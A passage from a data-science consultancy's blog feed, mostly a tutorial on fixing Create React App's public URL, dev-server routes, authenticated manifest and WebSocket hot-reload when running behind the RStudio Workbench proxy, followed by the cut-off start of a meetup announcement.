&lt;li&gt;&lt;a href="https://github.com/mhutchie/vscode-git-graph" rel="external"&gt;&lt;strong&gt;Git Graph&lt;/strong&gt;&lt;/a&gt;, for reviewing git history&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/gitkraken/vscode-gitlens" rel="external"&gt;&lt;strong&gt;GitLens&lt;/strong&gt;&lt;/a&gt;, for additional inline information
about git history&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/ide/server-pro/vscode_sessions/vs_code_sessions.html#rstudio-workbench-extension" rel="external"&gt;&lt;strong&gt;RStudio
Workbench&lt;/strong&gt;&lt;/a&gt;,
for detection of running servers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Start a new VS Code Session in RStudio Workbench" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/react-workbench/new_session.png" width="636"&gt;&lt;/p&gt;
&lt;p&gt;The last extension is the most important and is installed when following the RStudio Workbench
&lt;a href="https://docs.rstudio.com/rsw/documentation/" rel="external"&gt;installation guide&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We will assume a recent version of Node.js is installed; you can check with &lt;code&gt;nodejs --version&lt;/code&gt; (or &lt;code&gt;node --version&lt;/code&gt;, depending on how Node.js was installed). We are using
version 16.13.2. Open a VS Code Session in RStudio Workbench and create a new project:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx create-react-app my-app --template typescript
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="the-issues"&gt;The issues&lt;/h2&gt;
&lt;p&gt;Following the getting started instructions, we will enter the new project and start the development
server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd my-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm start
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If port 3000 is already in use, you will be prompted to use another port; allow this. Now we will
use the RStudio Workbench extension to find our development server, in our case, &lt;code&gt;0.0.0.0:3001&lt;/code&gt;:&lt;/p&gt;
&lt;img src="workbench_proxies.png" alt="RStudio Workbench sidebar with running servers" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;When you open one of these links you will find a blank page instead of the usual spinning React
logo. Inspecting the Console will identify several issues. These all stem from the URL provided by
the RStudio Workbench extension. We can easily resolve all of these problems.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Initial React App errors when running behind a proxy" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/react-workbench/react_errors.png" width="907"&gt;&lt;/p&gt;
&lt;h3 id="issue-1---incorrect-application-root"&gt;Issue 1 - Incorrect application root&lt;/h3&gt;
&lt;p&gt;The example template (&lt;code&gt;public/index.html&lt;/code&gt;) uses a variable PUBLIC_URL to enable development within
different environments. The favicon has an href of &lt;code&gt;%PUBLIC_URL%/favicon.ico&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Our application is now privately available at
&lt;code&gt;https://rstudio.jumpingrivers.cloud/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4/&lt;/code&gt; for us to use
and test while developing it. Click on a server in the RStudio Workbench extension to open your
own link.&lt;/p&gt;
&lt;p&gt;Create a file called &lt;code&gt;.env.development&lt;/code&gt; in the root of your project with the following contents:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;PUBLIC_URL&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If &lt;code&gt;npm start&lt;/code&gt; is still running, stop it now and restart it. Refresh your application now as well.
The session and process IDs will usually remain the same so you will have another blank page, but
fewer console errors.&lt;/p&gt;
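&lt;p&gt;Since the session and process IDs differ between users, you will need the path from your own link rather than ours. As a small sketch, the hypothetical helper &lt;code&gt;publicUrlFromLink&lt;/code&gt; below takes the link opened from the RStudio Workbench extension and derives the matching &lt;code&gt;PUBLIC_URL&lt;/code&gt; value by keeping only the path and dropping the trailing slash. It relies on the standard &lt;code&gt;URL&lt;/code&gt; class available in Node.js and browsers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Hypothetical helper: derive the PUBLIC_URL value from a Workbench link.
function publicUrlFromLink(link) {
  const path = new URL(link).pathname; // drop scheme and host
  // PUBLIC_URL is written without a trailing slash
  return path.endsWith("/") ? path.slice(0, -1) : path;
}

// The example link from this article; replace it with your own
const link =
  "https://rstudio.jumpingrivers.cloud/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4/";
console.log("PUBLIC_URL=" + publicUrlFromLink(link));
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The printed line can be pasted into &lt;code&gt;.env.development&lt;/code&gt; as is.&lt;/p&gt;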
&lt;h3 id="issue-2---incorrect-routes-in-express-dev-server"&gt;Issue 2 - Incorrect routes in Express dev server&lt;/h3&gt;
&lt;p&gt;The files you are expecting are now missing because the development server uses the new PUBLIC_URL
to serve content, but RStudio Workbench removes the subdirectories when it maps requests back to
the development server (0.0.0.0:3001 in our case).&lt;/p&gt;
&lt;p&gt;We can set up a proxy to serve content on both &amp;ldquo;/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4&amp;rdquo; and
&amp;ldquo;/&amp;rdquo;. Create a file &amp;ldquo;./src/setupProxy.js&amp;rdquo; with the following content:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;module.exports &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; (app) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app.use((req, _, next) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;req.url.startsWith(process.env.PUBLIC_URL))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req.url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; process.env.PUBLIC_URL &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; req.url;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; next();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you now restart the dev server (&lt;code&gt;npm start&lt;/code&gt;) and refresh the browser, you will finally see a
spinning React logo.&lt;/p&gt;
&lt;img src="react_app.png" alt="Default Create React App initial view" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
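&lt;p&gt;The rewriting rule inside the middleware can be tried out in isolation. The sketch below pulls the same logic into a plain function, with the hypothetical name &lt;code&gt;rewriteUrl&lt;/code&gt;, so that both cases are easy to see: a request that arrives with the prefix stripped gets it added back, and a request that already carries the prefix is left alone.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;// Same rule as the middleware, as a plain function (hypothetical name).
function rewriteUrl(url, publicUrl) {
  if (!url.startsWith(publicUrl)) {
    return publicUrl + url; // prefix was stripped by the proxy: restore it
  }
  return url; // prefix already present: nothing to do
}

const publicUrl = "/workbench/s/ecb2d3c9ab5a71bf18071/p/fc2c1fd4";
console.log(rewriteUrl("/static/js/bundle.js", publicUrl));
console.log(rewriteUrl(publicUrl + "/favicon.ico", publicUrl));
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;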
&lt;p&gt;Two errors in the console remain.&lt;/p&gt;
&lt;h3 id="issue-3---invalid-manifest"&gt;Issue 3 - Invalid manifest&lt;/h3&gt;
&lt;p&gt;By default, a web application manifest is requested without any authentication cookies, so the request fails behind the authenticated Workbench proxy.
This is a very easy fix.&lt;/p&gt;
&lt;p&gt;In &amp;ldquo;public/index.html&amp;rdquo; add &lt;code&gt;crossorigin=&amp;quot;use-credentials&amp;quot;&lt;/code&gt;, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;becomes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Refresh your application to see the changes immediately. In some cases you may require
authentication in production, but if not then you should only enable it in development mode. We can
use the already included &lt;code&gt;HtmlWebpackPlugin&lt;/code&gt; to conditionally include our changes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% if (process.env.NODE_ENV === &amp;#39;development&amp;#39;) { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;&amp;lt;!-- enable authentication in dev mode only --&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossorigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } else { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;blockquote&gt;
&lt;p&gt;Note that if you are running your production application behind a protected endpoint, such as when
using RStudio Connect, you may remove the conditional statement and include credentials in all cases.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="issue-4---websocket-connections"&gt;Issue 4 - WebSocket connections&lt;/h3&gt;
&lt;p&gt;Finally, you may have noticed that auto-reload is not enabled and there are network errors every ~5
seconds.&lt;/p&gt;
&lt;p&gt;We can fix this by intercepting all WebSocket connections made from our web page. Add a script tag
to the head of &amp;ldquo;public/index.html&amp;rdquo;. As with the authenticated manifest, we can embed this script
only when in development mode.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% if (process.env.NODE_ENV === &amp;#39;development&amp;#39;) { %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; WebSocketProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(window.WebSocket, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; construct(target, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Proxying WebSocket connection&amp;#34;&lt;/span&gt;, ...args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;let&lt;/span&gt; newUrl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;wss://&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; window.location.host &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/ws&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; ws &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; target(newUrl);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Configurable hooks
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; ws.hooks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beforeSend&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; () =&amp;gt; &lt;span style="color:#79c0ff"&gt;null&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; beforeReceive&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; () =&amp;gt; &lt;span style="color:#79c0ff"&gt;null&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Intercept send
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; sendProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(ws.send, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply(target, thisArg, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (ws.hooks.beforeSend(args) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; target.apply(thisArg, args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ws.send &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sendProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Intercept events
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; addEventListenerProxy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;new&lt;/span&gt; Proxy(ws.addEventListener, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply(target, thisArg, args) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (args[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; ws.hooks.beforeReceive(args) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; target.apply(thisArg, args);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ws.addEventListener &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; addEventListenerProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Object.defineProperty(ws, &lt;span style="color:#a5d6ff"&gt;&amp;#34;onmessage&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; set(func) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; onmessage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; onMessageProxy(event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (ws.hooks.beforeReceive(event) &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; func.call(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;, event);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; addEventListenerProxy.apply(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;, [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onmessage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;false&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Save reference
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; window._websockets &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; window._websockets &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; [];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window._websockets.push(ws);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ws;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.WebSocket &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; WebSocketProxy;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&amp;lt;&lt;/span&gt;% } %&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Refresh your application and wait to confirm that the WebSocket connection errors no longer
appear.&lt;/p&gt;
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Intercept WebSockets: &lt;a href="https://gist.github.com/Checksum/27867c20fa371014cf2a93eafb7e0204" rel="external"&gt;https://gist.github.com/Checksum/27867c20fa371014cf2a93eafb7e0204&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Change PUBLIC_URL: &lt;a href="https://stackoverflow.com/a/58508562" rel="external"&gt;https://stackoverflow.com/a/58508562&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;React development proxies:
&lt;a href="https://create-react-app.dev/docs/proxying-api-requests-in-development/" rel="external"&gt;https://create-react-app.dev/docs/proxying-api-requests-in-development/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Authenticated manifest.json: &lt;a href="https://stackoverflow.com/a/57184506" rel="external"&gt;https://stackoverflow.com/a/57184506&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Conditional index.html:
&lt;a href="https://betterprogramming.pub/how-to-conditionally-change-index-html-in-react-de090b51fed3" rel="external"&gt;https://betterprogramming.pub/how-to-conditionally-change-index-html-in-react-de090b51fed3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/react-workbench/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>North East Data Scientists Meetup</title><link>https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/</link><pubDate>Tue, 28 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re based in the North East of England and you&amp;rsquo;re looking for a place to
discuss all things R with like-minded people, then you might want to check out
the &lt;a href="https://www.meetup.com/Newcastle-Upon-Tyne-Data-Science-Meetup/" rel="external"&gt;North East Data Scientist (NEDS) Meetups&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Hosted every two months in the amazing &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst building&lt;/a&gt; in the centre of
Newcastle upon Tyne, the NEDS meetups are an excellent opportunity to network
with like-minded data science enthusiasts and professionals. We hold two talks
at each session presented by data science experts from across the North East,
and we have recently started running pre-event workshops delivered by our
very own JR trainers!&lt;/p&gt;
&lt;p&gt;The best thing is, the event is completely free, with costs covered by our generous
